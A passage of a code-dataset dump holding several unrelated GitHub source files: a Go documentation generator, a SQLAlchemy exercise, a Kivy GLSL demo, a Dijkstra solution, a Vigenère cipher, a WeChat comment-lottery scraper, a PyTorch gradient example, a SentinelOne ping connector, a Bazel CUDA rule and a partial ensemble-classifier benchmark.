\"\"\".format(\n id=header.lower().replace(' ', '-'),\n header=header,\n contents=contents,\n)\n\ndef update_file(output_path, formatter):\n with open(os.path.join(OUTPUT_DIR, output_path), 'r+') as output_file:\n contents = output_file.read()\n contents = replace_pkg_links(contents)\n\n ih = contents.index('')\n contents = '{}{}'.format(\n contents[:ih],\n '../' * output_path.count('/'),\n contents[ih:],\n )\n\n if formatter:\n contents = formatter(contents)\n\n output_file.seek(0)\n output_file.write(''.join(contents))\n\nrun('go get golang.org/x/tools/cmd/godoc@v0.0.0-20191213221258-04c2e8eff935')\n\ngopath = os.getenv('GOPATH')\ngodoc_process = subprocess.Popen(gopath + '/bin/godoc', cwd='../')\n\n# wait 3 seconds for the above process to be ready,\n# no easy API to ensure it actually is\nsleep(30)\n\nensure_clean_dir(OUTPUT_DIR)\nprint('-> Going to scrape the godoc server, this will take some time...')\nwget_error_code = run(\n 'wget -m -k -q -erobots=off -X src/ --no-host-directories --no-use-server-timestamps http://localhost:6060',\n cwd=OUTPUT_DIR,\n timeout=300, # 5 min\n ignore_errors=True,\n)\n\nprint('-> Done scraping. Killing process')\ngodoc_process.kill()\n\nif wget_error_code not in [0, 8]: # 0 is ok, 8 is server error we don't care about\n print('!!-> wget error code', wget_error_code)\n # sys.exit(wget_error_code)\n\nprint('-> Injecting additional documentation into scraped html files')\ngames = {}\nfor filename in os.listdir(GAMES_DOCS_DIR):\n with open(os.path.join(GAMES_DOCS_DIR, filename), 'r') as game_data_file:\n parsed_file = json.load(game_data_file)\n games[parsed_file['game_name']] = parsed_file\n\n# Inject/change up the index.html file a bit to be more Cadre game centric.\ndef root_index_update_contents(contents):\n # auto collapse all sections because the vast majority of the packages\n # are redundant to go users\n contents = contents.replace('class=\"toggleVisible\"', 'class=\"toggle\"')\n\n # and slice in some additional documentation data about the games\n i = contents.index('

')\n return contents[:i] + \"\"\"\n

Joueur.go Documentation

\n\nThis is the documentation for the Go Cadre client and its various game\npackages.\n\n{}\n{}\n\"\"\".format(\n template_collapsible_section(\n 'Games', \"\"\"\n

These are the games that are available to play via the Go Client. Their\n source code is stored in the directory: games/game_name/, where\n game_name is the name of the game.\n

\n\n
\n{}\n
\"\"\".format('\\n'.join([\n \"\"\"\n
{game_name}
\n
{description}
\n \"\"\".format(\n game_name=game_name,\n pkg_link=package_link_to(game_name),\n description=games[game_name]['description']\n ) for game_name in sorted(games.keys())\n ]))\n ),\n template_collapsible_section(\n \"Coding Your AI\", \"\"\"\n

Interfaces

\n

With the exception of your AI being a struct, all of the game\n components you will interact with are done through Go\n interfaces. This means that all attributes must be accessed via\n function calls, e.g:\n

\nplayer_name := ai.Player().Name()\n
\n

\n
\n

Unless otherwise noted in the documentation, assume all interfaces are\npopulated by an instance of a struct implementing that interface. However some\nattributes, function call, etc will explicitly tell you if the returned value\ncan be nullable (nil pointer).\n

\n\n

Modifying non AI files

\n

\nEach interface type inside of games/game_name/, except for your\n ai.go should ideally not be modified.
\nThey are intended to be read only constructs that hold the state of that\n object at the point in time you are reading its properties.\n

\n

\nWith that being is said, if you really wish to add functionality, such as\n helper functions, ensure they do not directly modify game state information,\n or interfere with our existing functionality, or there is a good chance your\n client will crash during gameplay with a DELTA_MERGE_FAILURE.\n

\n

Implimentation logic for the interfaces (except your AI) is all tucked away\n in games/internal/game_name_impl. It is highly reccomended not to\n modify these files as they are largey written by our \n Creer code generation tool and may need to be modified if the game\n structure is tweaked.\n

\n\n

Game Logic

\n\n

If you are attempting to figure out how the logic is executed for a game,\n that code is not here.
\n All Cadre game clients are dumb state tracking\n programs that facilitate IO between a game server and your AI in whatever\n programming language you choose.\n

\n

\nIf you wish to get the actual code for a game check in the\n Cerveau game server. Its directory structure is\n similar to most clients (such as this one).\n

\n\"\"\".format(\n cadre_link='https://github.com/siggame/Cadre',\n cerveau_link='https://github.com/siggame/Cerveau',\n creer_link='https://github.com/siggame/Creer',\n )),\n) + contents[i:]\n\nupdate_file('index.html', root_index_update_contents)\n\n# for each game, add additional text explaining the game\nfor game_name, game_docs in games.items():\n def game_index_update_contents(contents):\n i = contents.index('

\n{description}\n

\n

More Info

\n

\nThe full game rules for {game_name} can be found on GitHub.\n

\n

\nAdditional materials, such as the story and game template can be found on GitHub as well.\n

\n\"\"\".format(\n description=game_docs['description'],\n game_name=game_name,\n github=github_link_to(game_name)\n )\n ) + contents[i:]\n\n update_file(package_link_to(game_name), game_index_update_contents)\n\ncopyfile('./favicon.ico', os.path.join(OUTPUT_DIR, 'favicon.ico'))\n\nprint('<- Done generating Go docs')\n","repo_name":"siggame/Joueur.go","sub_path":"docs/generate_docs.py","file_name":"generate_docs.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73439919569","text":"#!/usr/bin/python3\n\"\"\"\nprints the State object with name passed as argument the database hbtn_0e_6_usa\nYou must use the module SQLAlchemy\ntake 4 arguments\n\"\"\"\n\n\nimport sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom model_state import Base, State\n\nif __name__ == \"__main__\":\n # MySQL connection using mysqldb driver\n engine = create_engine(\"mysql+mysqldb://{}:{}@localhost/{}\"\n .format(sys.argv[1], sys.argv[2], sys.argv[3]))\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n found = False\n for state in session.query(State):\n if state.name == sys.argv[4]:\n print(\"{}\".format(state.id))\n found = True\n break\n if found is False:\n print(\"Not found\")\n session.close()\n","repo_name":"crasride/holbertonschool-higher_level_programming","sub_path":"python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40280680453","text":"\"\"\"\nTODO: Describe goal of this demo and some bacground on these concepts:\n\n - Shaders\n - Glsl\n - OpenGL\n - Vertices\n\n\"\"\"\nfrom kivy.app import App\nfrom kivy.base import EventLoop\nfrom kivy.core.image import Image\nfrom kivy.graphics import Mesh\nfrom kivy.graphics.instructions import RenderContext\nfrom kivy.uix.widget import Widget\n\n\nclass BasicGlsl(Widget):\n def __init__(self, **kwargs):\n super(BasicGlsl, self).__init__(**kwargs)\n self.canvas = RenderContext(use_parent_projection=True)\n self.canvas.shader.source = 'basic.glsl'\n\n \"\"\" #1 Step\n There is no built-in standard format for definining vertices so we\n declare our own.\n\n In this case where we're creating Rectangles, we just need the position\n of each vertices == 'vPosition'. And since the rectangle is\n two-dimensional, we'll pass in 2 coordinates which are of float-type.\n\n \"\"\"\n fmt = (\n (b'vPosition', 2, 'float'),\n )\n\n \"\"\" #2 Step\n We now prepare the array the array that holds the vertices which we'll\n later hand over to the renderer.\n\n Note that the tuple should be flat and unstructured. The record format\n shal be defined separately.\n\n \"\"\"\n vertices = (\n 0, 0, # x=0, y=0\n 255, 0, # x=255, y=0\n 255, 255, # x=255, y=255\n 0, 255 # x=0, y=255\n )\n\n \"\"\" #3 Step\n Indices are needed to reuse the vertices as they're usually used in\n more than one triangle.\n\n Instead of repeating them in the array of vertices above, we resort to\n just repeating its index in the array of vertices.\n\n \"\"\"\n indices = (\n 0, 1, 2, # Three vertices make a triangle\n 2, 3, 0 # and another one.\n )\n\n with self.canvas:\n \"\"\" #4\n With all the required structures in place, we can assemble the mesh\n using Kivy's canvas instruction `Mesh`.\n\n It will be rendered over a normal widget which is pretty cool. This\n means that we can take advantage of all that Kivy goodness while\n utilizing the speed and efficiency of Glsl.\n\n \"\"\"\n Mesh(fmt=fmt, mode='triangles',\n indices=indices, vertices=vertices)\n\n\nclass ProceduralGlsl(Widget):\n def __init__(self, **kwargs):\n super(ProceduralGlsl, self).__init__(**kwargs)\n self.canvas = RenderContext(use_parent_projection=True)\n self.canvas.shader.source = 'procedural.glsl'\n\n fmt = (\n (b'vPosition', 2, 'float'),\n )\n\n vertices = (\n 255, 0,\n 510, 0,\n 510, 255,\n 255, 255\n )\n\n indices = (\n 0, 1, 2,\n 2, 3, 0\n )\n\n with self.canvas:\n Mesh(fmt=fmt, mode='triangles',\n indices=indices, vertices=vertices)\n\n\nclass ColorfulGlsl(Widget):\n def __init__(self, **kwargs):\n super(ColorfulGlsl, self).__init__(**kwargs)\n self.canvas = RenderContext(use_parent_projection=True)\n self.canvas.shader.source = 'colorful.glsl'\n\n fmt = (\n (b'vPosition', 2, 'float'),\n (b'vColor', 3, 'float'),\n )\n\n vertices = (\n 0, 255, 0.462, 0.839, 1,\n 255, 255, 0.831, 0.984, 0.474,\n 255, 510, 1, 0.541, 0.847,\n 0, 510, 1, 0.988, 0.474,\n )\n\n indices = (\n 0, 1, 2,\n 2, 3, 0\n )\n\n with self.canvas:\n Mesh(fmt=fmt, mode='triangles',\n indices=indices, vertices=vertices)\n\n\nclass TextureGlsl(Widget):\n def __init__(self, **kwargs):\n super(TextureGlsl, self).__init__(**kwargs)\n self.canvas = RenderContext(use_parent_projection=True)\n self.canvas.shader.source = 'texture.glsl'\n\n fmt = (\n (b'vPosition', 2, 'float'),\n (b'vTexCoords0', 2, 'float'),\n )\n\n vertices = (\n 255, 255, 0, 1,\n 510, 255, 1, 1,\n 510, 510, 1, 0,\n 255, 510, 0, 0,\n )\n\n indices = (\n 0, 1, 2,\n 2, 3, 0\n )\n\n with self.canvas:\n Mesh(fmt=fmt, mode='triangles',\n indices=indices, vertices=vertices,\n texture=Image('kivy.jpg').texture)\n\n\nclass GlslDemo(Widget):\n def __init__(self, **kwargs):\n super(GlslDemo, self).__init__(**kwargs)\n self.add_widget(BasicGlsl())\n self.add_widget(ProceduralGlsl())\n self.add_widget(ColorfulGlsl())\n self.add_widget(TextureGlsl())\n\n\nclass GlslApp(App):\n def build(self):\n EventLoop.ensure_window()\n return GlslDemo()\n\n\nif __name__ == '__main__':\n GlslApp().run()\n","repo_name":"cr8ivecodesmith/kivy-glsldemo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15433174515","text":"# BOJ. 4485 녹색 옷 입은 애가 젤다지\n# 설계 의도: 조건에 맞는 실행\n# 개선점: 다익스트라 구현\n# 1.\nimport sys\ndx = [1, 0, -1, 0]\ndy = [0, 1, 0, -1]\n\n\nN = int(sys.stdin.readline())\ncase_num = 1\nwhile N != 0:\n board = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n INF = 140626\n value_list = [INF] * (N**2)\n value_list[0] = board[0][0]\n visited = set()\n current_value = 0\n flag = True\n while flag:\n pick = value_list.index(min(value_list))\n x = pick // N\n y = pick % N\n current_value = value_list[pick]\n value_list[pick] = INF\n visited.add(pick)\n for direction in range(4):\n px = x + dx[direction]\n py = y + dy[direction]\n if px == N-1 and py == N-1:\n value_list[px * N + py] = board[px][py] + current_value\n flag = False\n break\n elif 0 <= px < N and 0 <= py < N and (N*px + py) not in visited:\n if board[px][py] + current_value < value_list[px*N + py]:\n value_list[px * N + py] = board[px][py] + current_value\n print(f'Problem {case_num}: {value_list[N*N - 1]}')\n N = int(sys.stdin.readline())\n case_num += 1","repo_name":"DataMarksman/TIL","sub_path":"2.Algorithm/2. Backjoon/02_problem_python/4485.녹색 옷 입은 애가 젤다지(다익스트라).py","file_name":"4485.녹색 옷 입은 애가 젤다지(다익스트라).py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8331337875","text":"# Kevin Chen\n# 10/24/17\n# This program will encode or decode your text in Vigenere cipher\n\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz\"\n\n\ndef encode_text():\n \"\"\"\n This program represent the way to encode text\n :return:encode, the new text after encode\n \"\"\"\n\n code_text = input(\"please enter the text you want to encode\")\n\n code_text = code_text.lower()\n\n code_text = code_text.replace(' ', '')\n\n key = input(\"please enter the key\")\n encode = \"\"\n for x in range(len(code_text)):\n num1 = alphabet.index(code_text[x])\n num2 = alphabet.index(key[x % len(key)])\n\n num = (num1+num2) % 26\n encode += alphabet[num]\n return(encode)\n\n\ndef decode_text():\n \"\"\"\n This program represent the way to decode text\n :return: the text after decode\n \"\"\"\n\n code = input(\"please enter the text you want to decode\")\n\n code = code.lower()\n\n code = code.replace(' ', '')\n\n key = input(\"please enter the key\")\n\n decode = \"\"\n for x in range(len(code)):\n num1 = alphabet.index(code[x])\n num2 = alphabet.index(key[x % len(key)])\n num = (num1-num2) % 26\n decode += alphabet[num]\n \n\n return(decode)\n\n\ndef main():\n choice = input(\"press e to encode, d to decode or q to quit\")\n\n if choice in [\"e\", \"E\"]:\n print(encode_text())\n elif choice in [\"d\", \"D\"]:\n print(decode_text())\n elif choice in [\"q\", \"Q\"]:\n print(\"thanks for playing, have a great day\")\nmain()\n","repo_name":"chenro1998/unit7","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13908557914","text":"# !/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n\r\nimport requests\r\nimport time\r\nimport pyquery\r\nimport re\r\nimport json\r\nimport random\r\nfrom operator import itemgetter\r\nfrom itertools import groupby\r\nimport os\r\n\r\n\r\nclass WeChat(object):\r\n\r\n def __init__(self, username, password):\r\n self.username = username\r\n self.password = password\r\n self.base_url = \"https://mp.weixin.qq.com\"\r\n self.login_url = \"https://mp.weixin.qq.com/cgi-bin/bizlogin?action=startlogin\"\r\n self.home_url = \"https://mp.weixin.qq.com/cgi-bin/bizlogin?action=login&token=&lang=zh_CN\"\r\n self.qrcode_url = \"https://mp.weixin.qq.com/cgi-bin/loginqrcode?action=getqrcode¶m=4300&rd=219\"\r\n self.login_status_url = \"https://mp.weixin.qq.com/cgi-bin/loginqrcode?action=ask&token=&lang=zh_CN&token=&lang=zh_CN&f=json&ajax=1&random=0.11243822677080184\"\r\n self.req = None\r\n self.redirect_url = None\r\n self.login()\r\n\r\n # 登陆\r\n def login(self):\r\n self.req = requests.session()\r\n self.req.get(url=self.base_url)\r\n response = self.req.post(\r\n url=self.login_url,\r\n headers={\r\n \"Referer\": self.base_url\r\n },\r\n data={\r\n \"username\": self.username, # 用户名\r\n \"pwd\": self.password, # 密码\r\n \"imgcode\": None,\r\n \"f\": \"json\",\r\n \"token\": None,\r\n \"lang\": \"zh_CN\",\r\n \"ajax\": 1\r\n }\r\n )\r\n self.redirect_url = self.base_url + response.json().get(\"redirect_url\")\r\n\r\n # 获取二维码\r\n def get_qrcode(self): # 获取扫码登录的二维码\r\n img_content = self.req.get(self.qrcode_url)\r\n f = open(\"QR_code.jpg\", \"wb\")\r\n f.write(img_content.content)\r\n f.close()\r\n print(\"二维码图片已下载,请扫码。。。\")\r\n return True\r\n\r\n # 获取登陆状态\r\n def get_login_status(self):\r\n time.sleep(2)\r\n status = False\r\n try:\r\n res = self.req.get(url=self.login_status_url)\r\n result = res.json()\r\n if result.get(\"status\") == 1:\r\n print(\"已确认,正在跳转下一页。。。\")\r\n status = True\r\n elif result.get(\"status\") == 4:\r\n print(\"扫码成功,请点击确认。。。\")\r\n else:\r\n print(\"请扫码。。。\")\r\n except Exception as e:\r\n print(e)\r\n finally:\r\n return status\r\n\r\n # 获取跳转url\r\n def get_redirect_url(self):\r\n home_response = self.req.post(\r\n url=self.home_url,\r\n headers={\r\n \"Referer\": self.redirect_url\r\n },\r\n data={\r\n \"token\": None,\r\n \"lang\": \"zh_CN\",\r\n \"f\": \"json\",\r\n \"ajax\": 1,\r\n \"random\": 0.2394270123688409\r\n }\r\n )\r\n redirect_url = None\r\n home_response = home_response.json()\r\n if home_response[\"base_resp\"].get(\"err_msg\") == \"ok\":\r\n redirect_url = self.base_url + home_response[\"redirect_url\"]\r\n return redirect_url\r\n\r\n # 获取留言总数\r\n def get_total_count(self, html_str):\r\n ret = re.search(r'list: (?P{.*})', html_str)\r\n total_count = 100\r\n if ret:\r\n comments = json.loads(ret.group(\"comments\"))\r\n total_count = comments[\"total_count\"] # 拿到留言总数\r\n return total_count\r\n\r\n # 获取留言页的url\r\n def get_comment_page_url(self, html_str):\r\n dom_obj = pyquery.PyQuery(html_str)\r\n stuff_url = dom_obj(\"a[data-id='10033']\").attr(\"href\")\r\n url = self.base_url + stuff_url\r\n return url\r\n\r\n def get(self, url):\r\n r = self.req.get(url)\r\n return r.text\r\n\r\n def get_comments(self, html_str):\r\n comments = {}\r\n r = re.search(r'list: (?P{.*})', html_str)\r\n if r:\r\n comments = json.loads(r.group(\"comments\"))\r\n return comments\r\n\r\n def pick(self, comments, num):\r\n # 对得到的comments按时间戳排序\r\n comments[\"comment\"].sort(key=itemgetter(\"post_time\"))\r\n # 按用户nick_name 分组,因为同一个人可以有多次评论\r\n d = groupby(comments[\"comment\"], key=itemgetter(\"nick_name\"))\r\n comments_list = ({k: list(v)} for k, v in d)\r\n r = random.sample(list(comments_list), num)\r\n print(\"抽 奖\".center(66, \"=\"))\r\n for item in r:\r\n for k in item:\r\n print(\"-恭喜-[{}]-中奖-!\".format(k).center(66))\r\n print(\"-留言内容:{}\".format(item[k][0].get(\"content\")))\r\n print(\"-留言时间:{}\".format(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(item[k][0].get(\"post_time\")))))\r\n print(\"=\" * 66)\r\n\r\n\r\nif __name__ == '__main__':\r\n # TODO: 提交前删除用户名和密码\r\n wc = WeChat(\"xxx\", \"xxx\")\r\n # 获取二维码\r\n r = wc.get_qrcode()\r\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\r\n os.popen(\"open -a Preview QR_code.jpg \")\r\n # 扫码,请求状态\r\n while r:\r\n r = not wc.get_login_status()\r\n # 扫码成功之后\r\n print(\"扫码成功\")\r\n redirect_url = wc.get_redirect_url()\r\n if redirect_url:\r\n # 获取跳转之后的html\r\n redirect_html = wc.get(redirect_url)\r\n # 获取留言页的url\r\n comments_page_url = wc.get_comment_page_url(redirect_html)\r\n # 获取留言页html\r\n comments_page_html = wc.get(comments_page_url)\r\n # 获取留言页的评论\r\n comments_tmp = wc.get_comments(comments_page_html)\r\n # 获取留言总数\r\n total_count = comments_tmp.get(\"total_count\")\r\n # 获取留言总数url\r\n total_comments_page_url = comments_page_url.replace(\"count=10\", \"count={}\".format(total_count))\r\n # 获取总的留言页\r\n total_comments_page_html = wc.get(total_comments_page_url)\r\n # 获取总留言\r\n total_comments = wc.get_comments(total_comments_page_html)\r\n # 抽奖\r\n wc.pick(total_comments, 3)\r\n\r\n else:\r\n print(\"扫码之后跳转失败。。。\")\r\n","repo_name":"martin1317/aboutPython","sub_path":"weixin_liwenzhou/wechat2.py","file_name":"wechat2.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71332618769","text":"import torch\n\nprint(\"Running\")\n\nX = torch.tensor([1,2,3,4], dtype=torch.float32)\nY = torch.tensor([2,4,6,8], dtype=torch.float32)\n\nw = torch.tensor(0.0, requires_grad=True, dtype=torch.float32)\n\ndef forward(x):\n return w*x\n\ndef loss(y, y_predited):\n return ((y_predited - y)**2).mean()\n\nprint(f'Prediction before training f(5) = {forward(5):.3f}')\n\n\nlearning_rate = 0.01\nn_iters = 100\n\nfor epoch in range(n_iters):\n #Training\n #prediction forward pass\n y_pred = forward(X)\n\n # Cost function MSE\n l = loss(Y, y_pred)\n\n # Gradient = backward\n l.backward() #dl/dw\n\n # update weights\n with torch.no_grad():\n w -= learning_rate * w.grad\n w.grad.zero_()\n\n if (epoch+1) % 10 == 0:\n print(f'epoch {epoch+1} w = {w.item():.3f} loss = {l.item():.8f}')\n\n\nprint(f'Prediction after training f(5) = {forward(5):.3f}')\n\n\n\n\n","repo_name":"Hansi1007/python-training-workspace","sub_path":"PyTorchTutorial/gradients_torch.py","file_name":"gradients_torch.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43032410506","text":"import json\nimport time\nfrom stix_shifter_utils.modules.base.stix_transmission.base_ping_connector \\\n import BasePingConnector\nfrom stix_shifter_utils.utils.error_response import ErrorResponder\nfrom aiohttp.client_exceptions import ClientConnectionError\nfrom stix_shifter_utils.utils import logger\n\n\nclass PingConnector(BasePingConnector):\n \"\"\"Ping connector class \"\"\"\n def __init__(self, api_client):\n self.api_client = api_client\n self.logger = logger.set_logger(__name__)\n self.connector = __name__.split('.')[1]\n\n async def ping_connection(self):\n \"\"\"\n Ping the endpoint\n :return: dict\n \"\"\"\n try:\n # Construct a response object\n return_obj = {}\n response_dict = {}\n return_obj, response_dict = await self.call_ping_datasource(return_obj,response_dict)\n except ClientConnectionError:\n response_dict['type'] = \"ConnectionError\"\n response_dict['message'] = \"Invalid Host\"\n ErrorResponder.fill_error(return_obj, response_dict, ['message'],\n connector=self.connector)\n except Exception as ex:\n if 'Max retries exceeded' in str(ex):\n # sleep added due to limitation of 1 call a second for each user token\n try:\n time.sleep(1)\n return_obj, response_dict = await self.call_ping_datasource(return_obj, response_dict)\n except ClientConnectionError:\n response_dict['type'] = \"ConnectionError\"\n response_dict['message'] = \"Invalid Host\"\n ErrorResponder.fill_error(return_obj, response_dict, ['message'],\n connector=self.connector)\n except Exception as err:\n self.logger.error('error when ping: %s', str(err))\n response_dict['message'] = str(err)\n ErrorResponder.fill_error(return_obj, response_dict, ['message'],\n connector=self.connector)\n return return_obj\n else:\n self.logger.error('error when ping: %s', str(ex))\n ErrorResponder.fill_error(return_obj, response_dict, ['message'],\n connector=self.connector)\n return return_obj\n\n async def call_ping_datasource(self, return_obj, response_dict):\n response = await self.api_client.ping_datasource()\n response_code = response.code\n response_txt = response.read().decode('utf-8')\n response_dict = json.loads(response_txt)\n if response_code == 200:\n return_obj['success'] = True\n return_obj['code'] = response_code\n else:\n return_obj['success'] = False\n return_obj['code'] = response_code\n return return_obj, response_dict\n","repo_name":"opencybersecurityalliance/stix-shifter","sub_path":"stix_shifter_modules/sentinelone/stix_transmission/ping_connector.py","file_name":"ping_connector.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"66"} +{"seq_id":"74812847251","text":"_CUDA_DIR = \"CUDA_DIR\"\n\ndef _impl(rctx):\n cuda_dir = rctx.os.environ.get(_CUDA_DIR, default = \"/usr/local/cuda\")\n rctx.symlink(\"{}/include\".format(cuda_dir), \"include\")\n rctx.symlink(\"{}/lib64\".format(cuda_dir), \"lib64\")\n rctx.file(\"WORKSPACE\")\n rctx.file(\"BUILD\", content = \"\"\"\npackage(default_visibility = [\"//visibility:public\"])\n\ncc_library(\n name = \"cudart_static\",\n srcs = [\"lib64/libcudart_static.a\"],\n hdrs = glob([\n \"include/*.h\",\n \"include/**/*.h\",\n ]),\n strip_include_prefix = \"include\",\n)\n\"\"\")\n\ncuda_configure = repository_rule(\n implementation = _impl,\n environ = [\n _CUDA_DIR,\n ],\n)\n","repo_name":"sail-sg/envpool","sub_path":"third_party/cuda/cuda.bzl","file_name":"cuda.bzl","file_ext":"bzl","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":944,"dataset":"github-code","pt":"66"} +{"seq_id":"25167897237","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript para testar a performance de classificação dos métodos ensemble\r\n\"\"\"\r\n\r\n#Importação dos pacotes utilizados para o estudo\r\nimport pandas as pd\r\nimport os\r\n\r\n#Importação dos métodos ensemble\r\nfrom sklearn.ensemble import BaggingClassifier\r\nfrom sklearn.ensemble import AdaBoostClassifier\r\nfrom sklearn.ensemble import StackingClassifier\r\n\r\n#Importação dos metodos de classificação de modelo único\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\n\r\n#Importação do pacote que divide a base em teste e treino\r\nfrom sklearn.model_selection import StratifiedKFold\r\nfrom sklearn.metrics import f1_score\r\n\r\nroot = 'bases'\r\nextension = '.csv'\r\n\r\nfor subdir, dirs, files in os.walk(root):\r\n for file in files:\r\n\r\n evaluation = {} \r\n\r\n #Lê a base de dados para o dataframe\r\n data = pd.read_csv(os.path.join(subdir, file))\r\n label = data.iloc[:, -1:]\r\n attri = data.iloc[:,:-1]\r\n \r\n #divide a base em teste e treino\r\n skf = StratifiedKFold(n_splits=4, shuffle=True, random_state=0)\r\n skf.get_n_splits(attri,label)\r\n \r\n #KNeighborsClassifier\r\n knn = KNeighborsClassifier()\r\n print('knn')\r\n\r\n\r\n #Support Vector Machine\r\n svm = SVC()\r\n print('svc')\r\n\r\n #Decision Tree\r\n dt = DecisionTreeClassifier()\r\n print('dt')\r\n\r\n #Neural Network\r\n nn = MLPClassifier()\r\n print('nn')\r\n\r\n #Naive Bayes\r\n nb = GaussianNB()\r\n print('nn')\r\n\r\n \r\n #Bagging\r\n bagging_knn = BaggingClassifier(knn)\r\n bagging_svm = BaggingClassifier(svm)\r\n bagging_dt = BaggingClassifier(dt)\r\n bagging_nn = BaggingClassifier(nn)\r\n bagging_nb = BaggingClassifier(nb,)\r\n\r\n\r\n #Boosting\r\n boosting_svm = AdaBoostClassifier(svm, algorithm='SAMME')\r\n boosting_dt = AdaBoostClassifier(dt)\r\n boosting_nb = AdaBoostClassifier(nb)\r\n\r\n #Stacking - Define os classificadores base\r\n estimators = [\r\n ('knn',knn),\r\n ('svm',svm),\r\n ('dt',dt),\r\n ('nn',nn),\r\n ('nb',nb)\r\n ]\r\n\r\n #define o meta-classificador\r\n stacking_knn = StackingClassifier(estimators=estimators, final_estimator=knn)\r\n stacking_svm = StackingClassifier(estimators=estimators, final_estimator=svm)\r\n stacking_dt = StackingClassifier(estimators=estimators, final_estimator=dt)\r\n stacking_nn = StackingClassifier(estimators=estimators, final_estimator=nn)\r\n stacking_nb = StackingClassifier(estimators=estimators, final_estimator=nb)\r\n \r\n for train_index,test_index in skf.split(attri,label):\r\n attri_train = attri.iloc[train_index]\r\n attri_test = attri.iloc[test_index] \r\n \r\n label_train = label.iloc[train_index].values.ravel()\r\n label_test = label.iloc[test_index].values.ravel()\r\n\r\n #Treina os classificadores de único aprendizado\r\n knn.fit(attri_train,label_train)\r\n svm.fit(attri_train,label_train)\r\n dt.fit(attri_train,label_train)\r\n nn.fit(attri_train,label_train)\r\n nb.fit(attri_train,label_train) \r\n\r\n #Treina os ensemble\r\n bagging_knn.fit(attri_train,label_train)\r\n bagging_svm.fit(attri_train,label_train)\r\n bagging_dt.fit(attri_train,label_train)\r\n bagging_nn.fit(attri_train,label_train)\r\n bagging_nb.fit(attri_train,label_train)\r\n\r\n boosting_svm.fit(attri_train,label_train)\r\n boosting_dt.fit(attri_train,label_train)\r\n boosting_nb.fit(attri_train,label_train)\r\n\r\n stacking_knn.fit(attri_train,label_train)\r\n stacking_svm.fit(attri_train,label_train)\r\n stacking_dt.fit(attri_train,label_train)\r\n stacking_nn.fit(attri_train,label_train)\r\n stacking_nb.fit(attri_train,label_train)\r\n \r\n\r\n #Avalia os classificadores \r\n predictions = knn.predict(attri_test) \r\n evaluation['kNN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['kNN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n\r\n predictions = svm.predict(attri_test) \r\n evaluation['SVM Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['SVM Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = dt.predict(attri_test) \r\n evaluation['DT Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['DT Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = nn.predict(attri_test) \r\n evaluation['NN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['NN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = nb.predict(attri_test) \r\n evaluation['NB Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['NB Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_knn.predict(attri_test) \r\n evaluation['Bagging_kNN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_kNN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_svm.predict(attri_test) \r\n evaluation['Bagging_SVM Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_SVM Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_dt.predict(attri_test) \r\n evaluation['Bagging_DT Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_DT Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_nn.predict(attri_test) \r\n evaluation['Bagging_NN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_NN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = bagging_nb.predict(attri_test) \r\n evaluation['Bagging_NB Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Bagging_NB Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = boosting_svm.predict(attri_test) \r\n evaluation['Boosting_SVM Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Boosting_SVM Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions 